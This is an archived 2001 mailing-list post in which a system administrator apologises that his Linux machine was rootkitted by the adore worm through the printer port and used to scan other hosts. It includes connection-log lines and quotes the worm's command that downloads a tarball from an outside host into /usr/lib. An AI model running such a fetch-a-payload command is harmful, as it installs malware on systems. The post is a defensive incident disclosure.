Mea Culpa

From: Etaoin Shrdlu (shrdluat_private)
Date: Sat Jun 23 2001 - 11:15:56 PDT

Next message: Rune Kristian Viken: "Re: Overwhelmed........"

Previous message: Jon Zobrist: "netbios scanning coming from IANA's internal class B...?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

If you saw anything from my redhat/linux machine in the past few hours,
Sorry.

Jun 23 07:42|206.111.213.148|2650|65.169.x.x|53
Jun 23 07:42|206.111.213.148|2822|65.199.x.x|515
Jun 23 07:42|206.111.213.148|2823|65.199.x.x|515

Yet another rootkit. It was slated to be upgraded to progeny/linux over
the weekend, and I'm still deciding on whether to bother with forensics.
It is an automated script, so I doubt that much information will be
useful. The standard stuff on the standard, easily compromisable ports.
They got in through the printer port, which I thought had been shut
down. Famous last words.

If it appears to be unique, I'll send it off to the places that seem to
be archiving these things. Most of the interesting data (and certainly
an early trigger) that warned me instantly that something was up
(besides the mad green lights on the router when I wasn't doing anything
to cause them) was clog (connection logger), a fine piece of code whose
original author seems to have disappeared from the face of the earth.

...

Well, after further examination, it's just yet another adore worm
running pscan-* stuff against innocent folk out there. It was dumping
from the following:

lynx -dump http://go.163.com/laowang2001/red.tar >/usr/lib/red.tar

The rest is history (except for all the passwords I get to change, just
in case I had a duplicate somewhere). Again, if my bad boy bothered you
from pacific time 11pm June 22 until approximately 8am june 23, I'm
sorry. I'll be reformatting the disk before it goes back up, and it'll
either have slack or debian (two civilized distros, in my personal
opinion), well-patched.

.shrdlu

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBOzTcliseoSr+8iWrEQKIeACg0vWZ/nSrgS0wIdId6epU3izbe7oAoJKq
H8F3x5rc+BG6441TNTIP9htP
=wol2
-----END PGP SIGNATURE-----

--
Computer security is an oxymoron.
Prepare for the worst.
                -- Bruce Schneier

Next message: Rune Kristian Viken: "Re: Overwhelmed........"
Previous message: Jon Zobrist: "netbios scanning coming from IANA's internal class B...?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 20:13:39 PDT